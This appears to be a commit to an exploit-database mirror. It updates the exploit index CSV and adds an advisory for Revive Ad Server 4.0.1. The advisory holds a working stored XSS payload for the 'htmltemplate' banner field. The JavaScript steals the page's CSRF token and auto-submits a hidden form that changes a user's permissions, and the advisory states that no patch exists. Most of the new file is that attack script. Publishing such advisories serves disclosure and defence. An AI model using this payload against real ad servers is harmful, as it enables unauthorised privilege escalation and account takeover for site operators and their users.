DB: 2017-04-27
1 new exploits Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery
This commit is contained in:
parent
9e9bf495c2
commit
0278b1993d
2 changed files with 65 additions and 1 deletions
|
@ -4052,7 +4052,7 @@ id,file,description,date,author,platform,type,port
|
||||||
32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0
|
32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0
|
||||||
32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0
|
32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0
|
||||||
32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0
|
32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0
|
||||||
32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
|
32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
|
||||||
32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0
|
32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0
|
||||||
32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0
|
32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0
|
||||||
32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0
|
32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0
|
||||||
|
@ -37788,3 +37788,4 @@ id,file,description,date,author,platform,type,port
|
||||||
41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
|
41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
|
||||||
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
||||||
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
|
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
|
||||||
|
41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
63
platforms/php/webapps/41939.txt
Executable file
63
platforms/php/webapps/41939.txt
Executable file
|
@ -0,0 +1,63 @@
|
||||||
|
---------------------------------------------------------------
|
||||||
|
# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
|
||||||
|
# Date: 24/04/2017
|
||||||
|
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
|
||||||
|
# Vendor Website : https://www.revive-adserver.com/
|
||||||
|
# Software download : https://www.revive-adserver.com/download/
|
||||||
|
# Version: 4.0.1
|
||||||
|
# Tested on: Windows 7 x64 SP1 / Kali Linux
|
||||||
|
|
||||||
|
|
||||||
|
Description :
|
||||||
|
|
||||||
|
A vulnerability has been discovered in Revive Ad Server, which can be
|
||||||
|
exploited by malicious people to conduct cross-site scripting attacks.
|
||||||
|
When you create a banner using Generic HTML Banner, input
|
||||||
|
|
||||||
|
passed via the 'htmltemplate' parameter to '/banner-edit.php' is not
|
||||||
|
|
||||||
|
properly sanitised before being returned to the user (This is probably
|
||||||
|
expected as it's an html banner). But, this can be exploited
|
||||||
|
to execute arbitrary HTML and script code in a user's browser session in
|
||||||
|
context of an affected site.
|
||||||
|
|
||||||
|
|
||||||
|
This XSS vector allow to execute scripts to gather the CSRF token
|
||||||
|
|
||||||
|
and submit a form to update user rights
|
||||||
|
|
||||||
|
|
||||||
|
Here's the script :
|
||||||
|
|
||||||
|
---------------------- Javascript-------------------------------
|
||||||
|
|
||||||
|
var tok = document.getElementsByName('token')[0].value;
|
||||||
|
|
||||||
|
var txt = '<form method="POST" id="hacked" action="agency-user.php">'
|
||||||
|
txt += '<input type="hidden" name="submit[]" value="1"/>'
|
||||||
|
txt += '<input type="hidden" name="token" value="' + tok + '"/>'
|
||||||
|
txt += '<input type="hidden" name="userid" value="2"/>'
|
||||||
|
txt += '<input type="hidden" name="email_address" value="test2@test.com"/>'
|
||||||
|
txt += '<input type="hidden" name="agencyid" value="1"/>'
|
||||||
|
txt += '<input type="hidden" name="permissions[]" value="10"/>'
|
||||||
|
txt += '</form>'
|
||||||
|
|
||||||
|
var d1 = document.getElementById('firstLevelContent');
|
||||||
|
|
||||||
|
d1.insertAdjacentHTML('afterend', txt);
|
||||||
|
|
||||||
|
document.getElementById("hacked").submit();
|
||||||
|
|
||||||
|
|
||||||
|
---------------------- Javascript End-------------------------------
|
||||||
|
|
||||||
|
(little trick to submit a form that has a "submit" parameter, just use a
|
||||||
|
list "submit[]")
|
||||||
|
|
||||||
|
This will update user rights and allow to manage accounts
|
||||||
|
|
||||||
|
POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM
|
||||||
|
|
||||||
|
Patch : No patch yet
|
||||||
|
|
||||||
|
---------------------------------------------------------------
|
Loading…
Add table
Reference in a new issue